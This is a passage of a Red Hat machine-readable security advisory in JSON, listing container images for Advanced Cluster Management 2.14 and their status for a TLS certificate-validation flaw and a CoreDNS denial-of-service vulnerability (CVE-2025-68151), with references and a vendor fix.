"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption"
},
{
"cve": "CVE-2025-68151",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-08T16:01:04.891768+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2428009"
}
],
"notes": [
{
"category": "description",
"text": "Multiple CoreDNS server implementations (gRPC, HTTPS, and HTTP/3) lack critical resource-limiting controls. An unauthenticated remote attacker can exhaust memory and degrade or crash the server by opening many concurrent connections, streams, or sending oversized request bodies. The issue is similar in nature to CVE-2025-47950 (QUIC DoS) but affects additional server types that do not enforce connection limits, stream limits, or message size constraints.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/coredns/coredns/core/dnsserver: CoreDNS DoS via unbounded connections and oversized messages",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68151"
},
{
"category": "external",
"summary": "RHBZ#2428009",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2428009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68151",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68151"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68151",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68151"
},
{
"category": "external",
"summary": "https://github.com/coredns/coredns/commit/0d8cbb1a6bcb6bc9c1a489865278b8725fa20812",
"url": "https://github.com/coredns/coredns/commit/0d8cbb1a6bcb6bc9c1a489865278b8725fa20812"
},
{
"category": "external",
"summary": "https://github.com/coredns/coredns/pull/7490",
"url": "https://github.com/coredns/coredns/pull/7490"
},
{
"category": "external",
"summary": "https://github.com/coredns/coredns/security/advisories/GHSA-527x-5wrf-22m2",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-527x-5wrf-22m2"
}
],
"release_date": "2026-01-08T15:33:12.711000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T20:51:55+00:00",
"details": "For release note details, see the upstream Submariner release notes:\n\nhttps://submariner.io/community/releases/\n\nDownstream-specific issues resolved:\n* ACM-27238\n* ACM-28294\n* ACM-28295\n* ACM-28311\n* ACM-28313\n* ACM-28314\n* ACM-28315\n* ACM-28316\n* ACM-28329\n* ACM-28331\n* ACM-28333\n* ACM-28335\n* ACM-28337\n* ACM-28339\n* ACM-28342\n* ACM-29317\n* ACM-29511\n* ACM-29613\n* ACM-29614\n* ACM-29631\n* ACM-29632\n* ACM-29633\n* ACM-29634\n* ACM-29776\n* ACM-30134\n* ACM-30726\n* ACM-30727\n* ACM-30728\n* ACM-30729\n* ACM-30970\n* ACM-31136\n* ACM-31831\n* ACM-31840\n* ACM-32575\n* ACM-32842\n* ACM-34108\n* ACM-34586\n* ACM-34589\n\nFor more details, see the Red Hat Advanced Cluster Management for Kubernetes documentation:\n\nhttps://docs.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.14/",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25127"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x",
